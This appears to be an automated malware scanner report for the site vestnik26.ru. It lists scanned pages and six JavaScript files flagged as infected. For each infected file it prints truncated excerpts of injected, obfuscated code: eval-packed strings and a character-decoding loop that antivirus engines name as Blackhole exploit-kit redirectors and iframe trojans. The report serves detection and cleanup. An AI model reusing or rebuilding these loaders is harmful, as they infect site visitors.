Malware Scanner report for vestnik26.ru

Malicious/Suspicious/Total urls checked: 6/0/15

6 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.vestnik26.ru/	200 OK Content-Length: 49112 Content-Type: text/html	clean
http://www.vestnik26.ru/templates/00069/js/jquery.js	200 OK Content-Length: 37255 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]\|\|e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<](<(.\|\\s)+>)[^>]$\|^#(\\w+)$/,62=/^.[^:#\\[\\.]$/,12;D.17=D.44={5j:H(d,b) ... 3090 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-688!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1h(1+1n[j]));}q=ss;e(q);} Antivirus reports: AntiVir HTML/ExpKit.Gen3 Avast JS:Includer-NS [Trj] K7AntiVirus Trojan ( e4e727470 ) K7GW Trojan ( e4e727470 ) Microsoft Trojan:JS/Redirector.LD NANO-Antivirus Trojan.Script.Blacole.tfthc F-Prot JS/Redir.NZ Commtouch JS/Redir.NZ
http://www.vestnik26.ru/templates/00069/js/slider.js	200 OK Content-Length: 6506 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) $(document).ready(function () { $('img.menu_class1').click(function () { $('div.the_menu1').slideToggle('medium'); }); }); $(document).ready(function () { $('img.menu_class2').click(function () { $('div.the_menu2').slideToggle('medium'); }); }); d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];if(1){f='fromCh';f+='arC';f+='qgode'["subst ... 3040 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-690!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1h(1+1*n[j]));}q=ss;e(q);} Antivirus reports: AntiVir JS/Blacole.KA Avast JS:Crypt-A [Trj] Ad-Aware Trojan.JS.Iframe.BJT Antiy-AVL Trojan/JS.Agent Ikarus Trojan.JS.Blacole nProtect Trojan.JS.Iframe.BJT K7AntiVirus Trojan ( e4e727470 ) Comodo TrojWare.HTML.IFrame.AGP Emsisoft Trojan-Downloader.JS.Agent (A) CAT-QuickHeal JS/BlacoleRef.W K7GW Exploit ( 04c5528e1 ) McAfee-GW-Edition JS/Exploit-Blacole.l DrWeb JS.IFrame.233 TrendMicro HEUR_HTJS.HDJSFN ViRobot JS.A.Agent.6506.B Microsoft Trojan:JS/BlacoleRef.W Kaspersky Trojan-Downloader.JS.Agent.gqu MicroWorld-eScan Trojan.JS.Iframe.BJT Fortinet JS/DarDuk.KT!tr TotalDefense JS/BlacoleRef.H Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.l NANO-Antivirus Trojan.Script.Blacole.bdcqcy ClamAV Trojan.Blackhole-483 F-Secure Trojan.JS.Iframe.BJT VIPRE Trojan-Downloader.JS.Agent.gup (v) F-Prot JS/Redir.NZ AVG HTML/Framer Norman Downloader.HIVI GData Trojan.JS.Iframe.BJT Symantec Trojan.Malscript!html Commtouch JS/Redir.NZ BitDefender Trojan.JS.Iframe.BJT
http://www.vestnik26.ru/engine/ajax/menu.js	200 OK Content-Length: 9566 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var menuwidth='165px';var disappeardelay=1000;var hidemenu_onclick="yes";var ie4=document.all;var ns6=document.getElementById&&!document.all;if(ie4\|\|ns6)document.write('<div id="dropmenudiv" style="visibility:hidden;position:absolute;z-index:100;width:'+menuwidth+';" onMouseover="clearhidemenu()" onMouseout="dynamichide(event)"></div>');function getposOffset(what,offsettype){var totaloffset=(offsettype=="left")?what.offsetLeft:what.offsetTop;var parentEl=what.offsetParent;whi ... 3069 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1h(1+1*n[j]));}q=ss;e(q);} Antivirus reports: AntiVir HTML/ExpKit.Gen3 Avast JS:Includer-NS [Trj] K7AntiVirus Trojan ( e4e727470 ) K7GW Trojan ( e4e727470 ) DrWeb JS.IFrame.233 Microsoft Trojan:JS/Redirector.LD NANO-Antivirus Trojan.Script.Blacole.tfthc Commtouch JS/Redir.NZ
http://www.vestnik26.ru/engine/ajax/dle_ajax.js	200 OK Content-Length: 11331 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]\|\|e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a 2D(){7 z=9.I("1F");6(z!=C){z.h.1G="2E";z.h.O=1H().18+\'1i\'}};a 1H(){7 d=9,w=m,P=d.1I&&d.1I!=\'2F\'?d.s:d.t;7 b=d.t;7 1J=(w.Q&&m.1K)?w.Q+w.1K:1j.1k(b. ... 3122 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-682!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1h(1+1*n[j]));}q=ss;e(q);} Antivirus reports: AntiVir HTML/ExpKit.Gen3 Avast JS:Includer-NS [Trj] K7AntiVirus Trojan ( e4e727470 ) K7GW Trojan ( e4e727470 ) Microsoft Trojan:JS/Redirector.LD NANO-Antivirus Trojan.Script.Blacole.tfthc F-Prot JS/Redir.NZ Commtouch JS/Redir.NZ
http://www.vestnik26.ru/engine/ajax/js_edit.js	200 OK Content-Length: 13377 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]\|\|e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5 L=l O();5 T=l O();5 1u;5 1v;5 1w;5 1x;7 2X(1a,1S,1T,1U){5 d=l O();d[0]=\'<a s="2Y://2Z.30.31/32/?1y=\'+1a+\'" 1b="1c">\'+1S+\'</a>\';d[1]=\'<a s="\'+e+ ... 3086 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-681!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1h(1+1*n[j]));}q=ss;e(q);} Antivirus reports: AntiVir HTML/ExpKit.Gen3 Avast JS:Includer-NS [Trj] K7AntiVirus Trojan ( e4e727470 ) K7GW Trojan ( e4e727470 ) Microsoft Trojan:JS/Redirector.LD NANO-Antivirus Trojan.Script.Blacole.tfthc F-Prot JS/Redir.NZ Commtouch JS/Redir.NZ
http://www.vestnik26.ru/engine/classes/highslide/highslide.js	200 OK Content-Length: 42150 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]\|\|e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('u m={S:{7J:\'8c\',92:\'ar...\',87:\'7p 1K aj\',ag:\'7p 1K an 1K al\',7Y:\'aq 1K aX H (f)\',9K:\'aZ by <i>9e 8b</i>\',9H:\'b0 1K aW 9e 8b aS\',7l:\ ... 3427 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-689!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1h(1+1*n[j]));}q=ss;e(q);} Antivirus reports: Avast JS:Includer-NV [Trj] K7AntiVirus Trojan ( e4e727470 ) K7GW Trojan ( e4e727470 ) Microsoft Trojan:JS/Redirector.LD NANO-Antivirus Trojan.Script.Blacole.tfthc F-Prot JS/Redir.NZ Commtouch JS/Redir.NZ
http://js.smi2.ru/data/js/30522.js	200 OK Content-Length: 3973 Content-Type: application/javascript	clean
http://www.vestnik26.ru/index.php?do=feedback	200 OK Content-Length: 36594 Content-Type: text/html	clean
http://www.vestnik26.ru/sitemap.xml	200 OK Content-Length: 4280 Content-Type: application/xml	clean
http://www.vestnik26.ru/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean
http://www.vestnik26.ru/engine/rss.php	200 OK Content-Length: 34893 Content-Type: application/xml	clean
http://www.vestnik26.ru/news/our_news/politics/	200 OK Content-Length: 36037 Content-Type: text/html	clean
http://www.vestnik26.ru/news/our_news/economy/	404 Not Found Content-Length: 34278 Content-Type: text/html	clean
http://www.vestnik26.ru/news/our_news/agriculture/	200 OK Content-Length: 35857 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: vestnik26.ru

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: vestnik26.ru
Referer: http://www.google.com/search?q=vestnik26.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=vestnik26.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://vestnik26.ru/

Result: vestnik26.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for vestnik26.ru

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools